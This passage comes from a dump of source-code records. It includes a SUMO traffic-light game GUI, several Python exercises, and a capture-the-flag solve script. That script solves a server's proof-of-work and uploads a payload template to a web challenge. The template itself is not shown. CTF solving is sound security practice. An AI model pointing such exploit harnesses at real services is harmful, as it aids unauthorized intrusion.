gaming GUI for the LNdW traffic light game.\nIt checks for possible scenarios in the current working directory\nand lets the user start them as a game. Furthermore it\nsaves highscores to local disc and to the central highscore server.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nimport os\nimport subprocess\nimport sys\nimport re\nimport pickle\nimport glob\ntry:\n import Tkinter\nexcept ImportError:\n import tkinter as Tkinter\nfrom optparse import OptionParser\nfrom xml.dom import pulldom\nfrom collections import defaultdict\n\nSUMO_HOME = os.environ.get('SUMO_HOME',\n os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', '..'))\nsys.path.append(os.path.join(SUMO_HOME, 'tools'))\nimport sumolib # noqa\n\n\n_UPLOAD = False if \"noupload\" in sys.argv else True\n_SCOREFILE = \"scores.pkl\"\nif _UPLOAD:\n _TIMEOUT = 5\n _SCORESERVER = \"sumo.dlr.de\"\n _SCORESCRIPT = \"/scores.php?game=TLS&\"\n_DEBUG = True if \"debug\" in sys.argv else False\n_SCORES = 30\n\n_LANGUAGE_EN = {'title': 'Interactive Traffic Light',\n 'cross': 'Simple Junction',\n 'cross_demo': 'Simple Junction (Demo)',\n 'square': 'Four Junctions',\n 'grid6': 'Six Junctions',\n 'kuehne': 'Prof. Kühne',\n 'bs3d': '3D Junction Virtual World',\n 'bs3Dosm': '3D Junction OpenStreetMap',\n 'ramp': 'Highway Ramp',\n 'corridor': 'Corridor',\n 'A10KW': 'Highway Ramp A10',\n 'DRT': 'Demand Responsive Transport (new)',\n 'DRT2': 'DRT - Advanced (new)',\n 'DRT_demo': 'DRT - Demo',\n 'high': 'Highscore',\n 'reset': 'Reset Highscore',\n 'lang': 'Deutsch',\n 'quit': 'Quit',\n 'Highscore': 'Highscore',\n 'Congratulations': 'Congratulations!',\n 'your score': 'Your Score',\n 'Continue': 'Continue',\n }\n_LANGUAGE_DE = {'title': 'Interaktives Ampelspiel',\n 'cross': 'Einfache Kreuzung',\n 'cross_demo': 'Einfache Kreuzung (Demo)',\n 'square': 'Vier Kreuzungen',\n 'grid6': 'Sechs Kreuzungen',\n 'kuehne': 'Prof. Kühne',\n 'bs3d': '3D Forschungskreuzung Virtuelle Welt',\n 'bs3Dosm': '3D Forschungskreuzung OpenStreetMap',\n 'ramp': 'Autobahnauffahrt',\n 'A10KW': 'A10 KW',\n 'DRT': 'Bedarfsbus (neu)',\n 'DRT2': 'Bedarfsbus für Fortgeschrittene (neu)',\n 'DRT_demo': 'Bedarfsbus - Demo',\n 'corridor': 'Strecke',\n 'high': 'Bestenliste',\n 'reset': 'Bestenliste zurücksetzen',\n 'lang': 'Englisch',\n 'quit': 'Beenden',\n 'Highscore': 'Bestenliste',\n 'Congratulations': 'Gratulation!',\n 'your score': 'Deine Punkte',\n 'Continue': 'Weiter',\n }\n\n\ndef printDebug(*args):\n if _DEBUG:\n print(\"DEBUG:\", end=\" \")\n for message in args:\n print(message, end=\" \")\n print()\n\n\nif _UPLOAD:\n printDebug(\"import httplib...\")\n try:\n import httplib # noqa\n printDebug(\"SUCCESS\")\n except ImportError:\n printDebug(\"FAILED - disabling upload...\")\n _UPLOAD = False\nif _UPLOAD:\n print(\"Highscore upload is enabled. To disable call this script with 'noupload' argument.\")\nelse:\n print(\"Upload is disabled.\")\n\n\ndef computeScoreFromWaitingTime(gamename):\n totalDistance = 0\n totalFuel = 0\n totalArrived = 0\n totalWaitingTime = 0\n complete = True\n for line in open(os.path.join(base, \"%s.netstate.xml\" % start.category)):\n m = re.search('= 0:\n rideDuration += float(ride.duration)\n rideStarted += 1\n if float(ride.arrival) >= 0:\n rideFinished += 1\n\n rideCount += 1\n\n if rideCount == 0:\n return 0, 0, False\n else:\n avgWT = rideWaitingTime / rideCount\n avgDur = 0 if rideStarted == 0 else rideDuration / rideStarted\n score = 5000 - int(avgWT + avgDur)\n if _DEBUG:\n print(\"rideWaitingTime=%s rideDuration=%s persons=%s started=%s finished=%s avgWT=%s avgDur=%s\" % (\n rideWaitingTime, rideDuration, rideCount, rideStarted, rideFinished, avgWT, avgDur))\n return score, rideCount, True\n\n\ndef computeScoreSquare(gamename):\n rideWaitingTime = 0\n rideDuration = 0\n rideStarted = 0\n rideFinished = 0\n tripinfos = gamename + \".tripinfos.xml\"\n rideCount = 0\n for ride in sumolib.xml.parse(tripinfos, 'tripinfo'):\n if float(ride.waitingTime) < 0:\n if _DEBUG:\n print(\"negative waitingTime\")\n ride.waitingTime = 10000\n rideWaitingTime += float(ride.waitingTime)\n if ride.vType.startswith(\"ev\"):\n rideWaitingTime += 10 * float(ride.waitingTime)\n if float(ride.duration) >= 0:\n rideDuration += float(ride.duration)\n rideStarted += 1\n if float(ride.arrival) >= 0:\n rideFinished += 1\n\n rideCount += 1\n\n if rideCount == 0:\n return 0, 0, False\n else:\n avgWT = rideWaitingTime / rideCount\n avgDur = 0 if rideStarted == 0 else rideDuration / rideStarted\n score = 1000 - int(avgWT + avgDur)\n if _DEBUG:\n print(\"rideWaitingTime=%s rideDuration=%s persons=%s started=%s finished=%s avgWT=%s avgDur=%s\" % (\n rideWaitingTime, rideDuration, rideCount, rideStarted, rideFinished, avgWT, avgDur))\n return score, rideCount, True\n\n\n_SCORING_FUNCTION = defaultdict(lambda: computeScoreFromWaitingTime)\n_SCORING_FUNCTION.update({\n 'A10KW': computeScoreFromTimeLoss,\n 'DRT': computeScoreDRT,\n 'DRT2': computeScoreDRT,\n 'DRT_demo': computeScoreDRT,\n 'square': computeScoreSquare,\n})\n\n\ndef loadHighscore():\n if _UPLOAD:\n printDebug(\"try to load highscore from scoreserver...\")\n try:\n conn = httplib.HTTPConnection(_SCORESERVER, timeout=_TIMEOUT)\n conn.request(\"GET\", _SCORESCRIPT + \"top=\" + str(_SCORES))\n response = conn.getresponse()\n if response.status == httplib.OK:\n scores = {}\n for line in response.read().splitlines():\n category, values = line.split()\n scores[category] = _SCORES * [(\"\", \"\", -1.)]\n for idx, item in enumerate(values.split(':')):\n name, game, score = item.split(',')\n scores[category][idx] = (name, game, int(float(score)))\n printDebug(\"SUCCESS\")\n return scores\n except Exception:\n printDebug(\"FAILED\")\n\n try:\n return pickle.load(open(_SCOREFILE))\n except Exception:\n pass\n return {}\n\n\ndef parseEndTime(cfg):\n cfg_doc = pulldom.parse(cfg)\n for event, parsenode in cfg_doc:\n if event == pulldom.START_ELEMENT and parsenode.localName == 'end':\n return float(parsenode.getAttribute('value'))\n\n\nclass IMAGE:\n pass\n\n\nclass StartDialog(Tkinter.Frame):\n\n def __init__(self, parent, lang):\n Tkinter.Frame.__init__(self, parent)\n # variables for changing language\n self.parent = parent\n self._language_text = lang\n self.buttons = []\n # misc variables\n self.name = ''\n # setup gui\n self.parent.title(self._language_text['title'])\n self.parent.minsize(250, 50)\n self.category = None\n\n # we use a grid layout with 4 columns\n COL_DLRLOGO, COL_START, COL_HIGH, COL_SUMOLOGO = range(4)\n # there is one column for every config, +2 more columns for control\n # buttons\n configs = sorted(glob.glob(os.path.join(base, \"*.sumocfg\")))\n numButtons = len(configs) + 3\n # button dimensions\n bWidth_start = 30\n bWidth_high = 10\n bWidth_control = 41\n\n self.gametime = 0\n self.ret = 0\n # some pretty images\n Tkinter.Label(self, image=IMAGE.dlrLogo).grid(\n row=0, rowspan=numButtons, column=COL_DLRLOGO)\n Tkinter.Label(self, image=IMAGE.sumoLogo).grid(\n row=0, rowspan=numButtons, column=COL_SUMOLOGO)\n\n # 2 button for each config (start, highscore)\n for row, cfg in enumerate(configs):\n if \"bs3\" in cfg and not haveOSG:\n continue\n category = self.category_name(cfg)\n # lambda must make a copy of cfg argument\n button = Tkinter.Button(self, width=bWidth_start,\n command=lambda cfg=cfg: self.start_cfg(cfg))\n self.addButton(button, category)\n button.grid(row=row, column=COL_START)\n\n button = Tkinter.Button(self, width=bWidth_high,\n command=lambda cfg=cfg: ScoreDialog(self, [], None, self.category_name(cfg),\n self._language_text)\n ) # .grid(row=row, column=COL_HIGH)\n self.addButton(button, 'high')\n button.grid(row=row, column=COL_HIGH)\n\n # control buttons\n button = Tkinter.Button(\n self, width=bWidth_control, command=high.clear)\n self.addButton(button, 'reset')\n button.grid(row=numButtons - 3, column=COL_START, columnspan=2)\n\n button = Tkinter.Button(\n self, width=bWidth_control, command=sys.exit)\n self.addButton(button, 'quit')\n button.grid(row=numButtons - 1, column=COL_START, columnspan=2)\n\n button = Tkinter.Button(\n self, width=bWidth_control, command=lambda: self.change_language())\n self.addButton(button, 'lang')\n button.grid(row=numButtons - 2, column=COL_START, columnspan=2)\n\n self.grid()\n # The following three commands are needed so the window pops\n # up on top on Windows...\n self.parent.iconify()\n self.parent.update()\n self.parent.deiconify()\n\n def addButton(self, button, text):\n button[\"text\"] = self._language_text.get(text, text)\n self.buttons.append((text, button))\n\n def change_language(self):\n if self._language_text == _LANGUAGE_DE:\n self._language_text = _LANGUAGE_EN\n else:\n self._language_text = _LANGUAGE_DE\n for text, button in self.buttons:\n button[\"text\"] = self._language_text[text]\n\n def category_name(self, cfg):\n return os.path.basename(cfg)[:-8]\n\n def start_cfg(self, cfg):\n # remember which which cfg was launched\n self.category = self.category_name(cfg)\n if _DEBUG:\n print(\"starting\", cfg)\n self.gametime = parseEndTime(cfg)\n self.ret = subprocess.call(\n [guisimPath, \"-S\", \"-G\", \"-Q\", \"-c\", cfg, '-l', 'log',\n '--output-prefix', \"%s.\" % self.category,\n '--duration-log.statistics',\n '--tripinfo-output.write-unfinished'], stderr=sys.stderr)\n\n if _DEBUG:\n print(\"ended\", cfg)\n\n # compute score\n score, totalArrived, complete = _SCORING_FUNCTION[self.category](self.category)\n\n # parse switches\n switch = []\n lastProg = {}\n tlsfile = os.path.join(base, \"%s.tlsstate.xml\" % start.category)\n if os.path.exists(tlsfile):\n for line in open(tlsfile):\n m = re.search(r'tlsstate time=\"(\\d+(.\\d+)?)\" id=\"([^\"]*)\" programID=\"([^\"]*)\"', line)\n if m:\n tls = m.group(3)\n program = m.group(4)\n if tls not in lastProg or lastProg[tls] != program:\n lastProg[tls] = program\n switch += [m.group(3), m.group(1)]\n\n lang = start._language_text\n if _DEBUG:\n print(switch, score, totalArrived, complete)\n if complete:\n ScoreDialog(self, switch, score, self.category, lang)\n\n # if ret != 0:\n # quit on error\n # sys.exit(start.ret)\n\n\nclass ScoreDialog:\n\n def __init__(self, parent, switch, score, category, lang):\n self.root = Tkinter.Toplevel(parent)\n # self.root.transient(parent)\n self.name = None\n self.switch = switch\n self.score = score\n self.category = category\n self.root.title(lang[\"Highscore\"])\n self.root.minsize(250, 50)\n haveHigh = False\n\n if category not in high:\n high[category] = _SCORES * [(\"\", \"\", -1.)]\n idx = 0\n for n, g, p in high[category]:\n if not haveHigh and p < score:\n Tkinter.Label(\n self.root, text=(str(idx + 1) + '. ')).grid(row=idx)\n self.name = Tkinter.Entry(self.root)\n self.name.grid(row=idx, sticky=Tkinter.W, column=1)\n self.scoreLabel = Tkinter.Label(self.root, text=str(score),\n bg=\"pale green\").grid(row=idx, column=2)\n self.idx = idx\n haveHigh = True\n self.root.title(lang[\"Congratulations\"])\n idx += 1\n if p == -1 or idx == _SCORES:\n break\n Tkinter.Label(self.root, text=(str(idx + 1) + '. ')).grid(row=idx)\n Tkinter.Label(self.root, text=n, padx=5).grid(\n row=idx, sticky=Tkinter.W, column=1)\n Tkinter.Label(self.root, text=str(p)).grid(row=idx, column=2)\n idx += 1\n if not haveHigh:\n if score is not None: # not called from the main menue\n Tkinter.Label(self.root, text=lang['your score'], padx=5,\n bg=\"indian red\").grid(row=idx, sticky=Tkinter.W, column=1)\n Tkinter.Label(self.root, text=str(score),\n bg=\"indian red\").grid(row=idx, column=2)\n idx += 1\n Tkinter.Button(self.root, text=lang[\"Continue\"], command=self.save).grid(\n row=idx, column=2)\n\n # add QR-code for LNDW\n Tkinter.Label(self.root, image=IMAGE.qrCode).grid(\n row=1, column=3, rowspan=22)\n\n self.root.grid()\n self.root.bind(\"\", self.save)\n # self.root.wait_visibility()\n # self.root.grab_set()\n if self.name:\n self.name.focus_set()\n # The following three commands are needed so the window pops\n # up on top on Windows...\n # self.root.iconify()\n # self.root.update()\n # self.root.deiconify()\n # self.root.mainloop()\n\n def save(self, event=None):\n if self.name and self.name.get():\n name = self.name.get()\n high[self.category].insert(\n self.idx, (name, self.switch, self.score))\n high[self.category].pop()\n self.name.destroy()\n self.name = None\n Tkinter.Label(self.root, text=name, padx=5,\n bg=\"pale green\").grid(row=self.idx, sticky=Tkinter.W, column=1)\n try:\n f = open(_SCOREFILE, 'w')\n pickle.dump(high, f)\n f.close()\n except Exception:\n pass\n\n if _UPLOAD:\n printDebug(\"try to upload score...\")\n try:\n conn = httplib.HTTPConnection(_SCORESERVER, timeout=_TIMEOUT)\n conn.request(\"GET\", _SCORESCRIPT + \"category=%s&name=%s&instance=%s&points=%s\" % (\n self.category, name, \"_\".join(self.switch), self.score))\n if _DEBUG:\n r1 = conn.getresponse()\n print(r1.status, r1.reason, r1.read())\n printDebug(\"SUCCESS\")\n except BaseException:\n printDebug(\"FAILED\")\n self.quit()\n\n def quit(self, event=None):\n self.root.destroy()\n\n\nstereoModes = (\n 'ANAGLYPHIC', 'QUAD_BUFFER', 'VERTICAL_SPLIT', 'HORIZONTAL_SPLIT')\noptParser = OptionParser()\noptParser.add_option(\"-s\", \"--stereo\", metavar=\"OSG_STEREO_MODE\",\n help=\"Defines the stereo mode to use for 3D output; unique prefix of %s\" % (\n \", \".join(stereoModes)))\noptions, args = optParser.parse_args()\n\nbase = os.path.dirname(sys.argv[0])\nhigh = loadHighscore()\n\n\nguisimPath = sumolib.checkBinary(\"sumo-gui\")\nhaveOSG = \"OSG\" in subprocess.check_output(sumolib.checkBinary(\"sumo\"), universal_newlines=True)\n\nif options.stereo:\n for m in stereoModes:\n if m.lower().startswith(options.stereo.lower()):\n os.environ[\"OSG_STEREO_MODE\"] = m\n os.environ[\"OSG_STEREO\"] = \"ON\"\n break\n\nlang = _LANGUAGE_EN\nif \"OSG_FILE_PATH\" in os.environ:\n os.environ[\"OSG_FILE_PATH\"] += os.pathsep + \\\n os.path.join(os.environ.get(\"SUMO_HOME\", \"\"), \"data\", \"3D\")\nelse:\n os.environ[\"OSG_FILE_PATH\"] = os.path.join(\n os.environ.get(\"SUMO_HOME\", \"\"), \"data\", \"3D\")\n\nroot = Tkinter.Tk()\nIMAGE.dlrLogo = Tkinter.PhotoImage(file='dlr.gif')\nIMAGE.sumoLogo = Tkinter.PhotoImage(file='sumo_logo.gif')\nIMAGE.qrCode = Tkinter.PhotoImage(file='qr_sumo.dlr.de.gif')\nstart = StartDialog(root, lang)\nroot.mainloop()\n"},"avg_line_length":{"kind":"number","value":36.3556701031,"string":"36.35567"},"max_line_length":{"kind":"number","value":112,"string":"112"},"alphanum_fraction":{"kind":"number","value":0.5656221939,"string":"0.565622"}}},{"rowIdx":46377,"cells":{"hexsha":{"kind":"string","value":"c30b8b72f076c5457f9f0e8c230a44a9cc7a8e5f"},"size":{"kind":"number","value":1044,"string":"1,044"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"web/Electroplating/solve.py"},"max_stars_repo_name":{"kind":"string","value":"NoXLaw/RaRCTF2021-Challenges-Public"},"max_stars_repo_head_hexsha":{"kind":"string","value":"1a1b094359b88f8ebbc83a6b26d27ffb2602458f"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"web/Electroplating/solve.py"},"max_issues_repo_name":{"kind":"string","value":"NoXLaw/RaRCTF2021-Challenges-Public"},"max_issues_repo_head_hexsha":{"kind":"string","value":"1a1b094359b88f8ebbc83a6b26d27ffb2602458f"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"web/Electroplating/solve.py"},"max_forks_repo_name":{"kind":"string","value":"NoXLaw/RaRCTF2021-Challenges-Public"},"max_forks_repo_head_hexsha":{"kind":"string","value":"1a1b094359b88f8ebbc83a6b26d27ffb2602458f"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"import requests\n\nimport hashlib\nimport uuid\nimport binascii\nimport os\nimport sys\n\ndef generate():\n return uuid.uuid4().hex[:4], uuid.uuid4().hex[:4]\n\ndef verify(prefix, suffix, answer, difficulty=6):\n hash = hashlib.sha256(prefix.encode() + answer.encode() + suffix.encode()).hexdigest()\n return hash.endswith(\"0\"*difficulty)\n\ndef solve(prefix, suffix, difficulty):\n while True:\n test = binascii.hexlify(os.urandom(4)).decode()\n if verify(prefix, suffix, test, difficulty):\n return test\n\nif len(sys.argv) < 2:\n print(\"Usage: solve.py http://host:port/\")\n exit()\n\ns = requests.Session()\nhost = sys.argv[1]\ndata = s.get(host + \"pow\").json()\nprint(\"Solving POW\")\nsolution = solve(data['pref'], data['suff'], 6)\nprint(f\"Solved: {solution}\")\n\ns.post(host + \"pow\", json={\"answer\": solution})\n\nr = s.post(host, files={\"file\": open('solve.htmlrs', 'rb')})\n# r = s.post(host, files={\"file\": open('src/template.htmlrs', 'rb')})\nprint(r.text)\ntry:\n print(r.text.split('\\n')[14])\nexcept:\n print(\"Blocked\")\n\n"},"avg_line_length":{"kind":"number","value":24.2790697674,"string":"24.27907"},"max_line_length":{"kind":"number","value":90,"string":"90"},"alphanum_fraction":{"kind":"number","value":0.6446360153,"string":"0.644636"}}},{"rowIdx":46378,"cells":{"hexsha":{"kind":"string","value":"c351dec159890595ef75075c3943491ddc436720"},"size":{"kind":"number","value":892,"string":"892"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"exercises/python/data-types/collections/default-dict.py"},"max_stars_repo_name":{"kind":"string","value":"rogeriosantosf/hacker-rank-profile"},"max_stars_repo_head_hexsha":{"kind":"string","value":"d4b9c131524d138c415e5c5de4e38c6b8c35dd77"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"exercises/python/data-types/collections/default-dict.py"},"max_issues_repo_name":{"kind":"string","value":"rogeriosantosf/hacker-rank-profile"},"max_issues_repo_head_hexsha":{"kind":"string","value":"d4b9c131524d138c415e5c5de4e38c6b8c35dd77"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"exercises/python/data-types/collections/default-dict.py"},"max_forks_repo_name":{"kind":"string","value":"rogeriosantosf/hacker-rank-profile"},"max_forks_repo_head_hexsha":{"kind":"string","value":"d4b9c131524d138c415e5c5de4e38c6b8c35dd77"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"# In this challenge, you will be given 2 integers, m and n. \n# There are n words, which might repeat, in word group A. \n# There are m words belonging to word group B. \n# For each m words, check whether the word has appeared in group A or not. \n# Print the indices of each occurrence of m in group A. \n# If it does not appear, print -1.\n\nfrom collections import defaultdict\n\nif __name__ == '__main__':\n n, m = map(int, input().split())\n groups = defaultdict(list)\n\n for _ in range(n):\n groups['A'].append(input())\n\n for _ in range(m):\n groups['B'].append(input())\n\n for letter in groups['B']:\n if letter in groups['A']:\n occur = []\n for i in range(len(groups['A'])):\n if groups['A'][i] == letter:\n occur.append(i + 1)\n print(\" \".join(map(str, occur)))\n else:\n print(\"-1\")\n"},"avg_line_length":{"kind":"number","value":30.7586206897,"string":"30.758621"},"max_line_length":{"kind":"number","value":75,"string":"75"},"alphanum_fraction":{"kind":"number","value":0.5717488789,"string":"0.571749"}}},{"rowIdx":46379,"cells":{"hexsha":{"kind":"string","value":"6f50f82050e54f4868ea22dbd8655476c4e1c5f4"},"size":{"kind":"number","value":1619,"string":"1,619"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"2-resources/_External-learning-resources/02-pyth/python-ds-master/data_structures/graphs/shortest_path_unweighted_graph.py"},"max_stars_repo_name":{"kind":"string","value":"eengineergz/Lambda"},"max_stars_repo_head_hexsha":{"kind":"string","value":"1fe511f7ef550aed998b75c18a432abf6ab41c5f"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"2-resources/_External-learning-resources/02-pyth/python-ds-master/data_structures/graphs/shortest_path_unweighted_graph.py"},"max_issues_repo_name":{"kind":"string","value":"eengineergz/Lambda"},"max_issues_repo_head_hexsha":{"kind":"string","value":"1fe511f7ef550aed998b75c18a432abf6ab41c5f"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"2-resources/_External-learning-resources/02-pyth/python-ds-master/data_structures/graphs/shortest_path_unweighted_graph.py"},"max_forks_repo_name":{"kind":"string","value":"eengineergz/Lambda"},"max_forks_repo_head_hexsha":{"kind":"string","value":"1fe511f7ef550aed998b75c18a432abf6ab41c5f"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":1,"string":"1"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2021-11-05T07:48:26.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2021-11-05T07:48:26.000Z"},"content":{"kind":"string","value":"\"\"\"\nFind the shortest path between two nodes in an unweighted undirected graph. Remember this\nis about finding the shortest path, not the shortest distance. For shortest\ndistance you can simply calculate the level of nodes from the source vertex\nand that will give the answer. For shortest path, use the concept of parents of \nBellman-Ford algorithm.\n\nSimply do a BFS and keep track of parents of each node. Then recursively print the \nparents of destination node until the source node.\n\"\"\"\n\nfrom collections import defaultdict\n\nclass Graph:\n\n def __init__(self, vertices):\n self.vertices = vertices\n self.graph = defaultdict(list)\n\n\n def add_edge(self, u, v):\n self.graph[u].append(v)\n self.graph[v].append(u)\n\n \n def bfs(self, s):\n parent = [-1] * self.vertices\n visited = [False] * self.vertices\n visited[s] = True\n queue = []\n queue.append(s)\n\n while queue:\n s = queue.pop(0)\n\n for i in self.graph[s]:\n if visited[i] == False:\n queue.append(i)\n parent[i] = s\n visited[i] = True\n \n return parent\n\n \n def shortest_path(self, source, dest):\n parent = self.bfs(source)\n\n while True:\n print(dest, end=' ')\n dest = parent[dest]\n\n if dest == source:\n break\n\n\ng = Graph(8)\ng.add_edge(0, 1)\ng.add_edge(0, 3)\ng.add_edge(1, 2)\ng.add_edge(3, 4)\ng.add_edge(3, 7)\ng.add_edge(4, 5)\ng.add_edge(4, 6)\ng.add_edge(4, 7)\ng.add_edge(5, 6)\ng.add_edge(6, 7)\n\ng.shortest_path(0, 7)"},"avg_line_length":{"kind":"number","value":23.8088235294,"string":"23.808824"},"max_line_length":{"kind":"number","value":89,"string":"89"},"alphanum_fraction":{"kind":"number","value":0.5948116121,"string":"0.594812"}}},{"rowIdx":46380,"cells":{"hexsha":{"kind":"string","value":"48cd470862b5566406b88bf33d5cc16654b91e0a"},"size":{"kind":"number","value":302,"string":"302"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Programming Languages/Python/Theory/100_Python_Challenges/Section _1_Basic_Coding_Exercises/3. return the quotient and remainder.py"},"max_stars_repo_name":{"kind":"string","value":"jaswinder9051998/Resources"},"max_stars_repo_head_hexsha":{"kind":"string","value":"fd468af37bf24ca57555d153ee64693c018e822e"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":101,"string":"101"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-12-20T11:57:11.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-23T09:49:13.000Z"},"max_issues_repo_path":{"kind":"string","value":"Programming Languages/Python/Theory/100_Python_Challenges/Section _1_Basic_Coding_Exercises/3. return the quotient and remainder.py"},"max_issues_repo_name":{"kind":"string","value":"Sid-1164/Resources"},"max_issues_repo_head_hexsha":{"kind":"string","value":"3987dcaeddc8825f9bc79609ff26094282b8ece1"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":4,"string":"4"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2022-01-12T11:55:56.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-02-12T04:53:33.000Z"},"max_forks_repo_path":{"kind":"string","value":"Programming Languages/Python/Theory/100_Python_Challenges/Section _1_Basic_Coding_Exercises/3. return the quotient and remainder.py"},"max_forks_repo_name":{"kind":"string","value":"Sid-1164/Resources"},"max_forks_repo_head_hexsha":{"kind":"string","value":"3987dcaeddc8825f9bc79609ff26094282b8ece1"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":38,"string":"38"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2022-01-12T11:56:16.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-23T10:07:52.000Z"},"content":{"kind":"string","value":"\"\"\"\n1. Write a function that accepts two integers num1 and num2. The function should divide num1 by num2\nand return the quotient and remainder. The output can be rounded to 2 decimal places.\n\"\"\"\n\n\ndef quot_rem(num1,num2):\n q = round((num1 / num2), 2)\n r = round((num1 % num2), 2)\n return (q,r)"},"avg_line_length":{"kind":"number","value":30.2,"string":"30.2"},"max_line_length":{"kind":"number","value":100,"string":"100"},"alphanum_fraction":{"kind":"number","value":0.6854304636,"string":"0.68543"}}},{"rowIdx":46381,"cells":{"hexsha":{"kind":"string","value":"d28c7a51f180fe4d9711b5cf099c91ea2d70c774"},"size":{"kind":"number","value":580,"string":"580"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"python/asyncio/tasks.py"},"max_stars_repo_name":{"kind":"string","value":"zeroam/TIL"},"max_stars_repo_head_hexsha":{"kind":"string","value":"43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"python/asyncio/tasks.py"},"max_issues_repo_name":{"kind":"string","value":"zeroam/TIL"},"max_issues_repo_head_hexsha":{"kind":"string","value":"43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"python/asyncio/tasks.py"},"max_forks_repo_name":{"kind":"string","value":"zeroam/TIL"},"max_forks_repo_head_hexsha":{"kind":"string","value":"43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"import asyncio\n\n\nasync def my_task(seconds):\n \"\"\"\n A task to do for a number of seconds\n \"\"\"\n print('This task is taking {} seconds to complete'.format(seconds))\n await asyncio.sleep(seconds)\n return 'task finished'\n\n\nif __name__ == '__main__':\n my_event_loop = asyncio.get_event_loop()\n try:\n print('task creation started')\n task_obj = my_event_loop.create_task(my_task(seconds=2))\n my_event_loop.run_until_complete(task_obj)\n finally:\n my_event_loop.close()\n\n print(\"The task's result was: 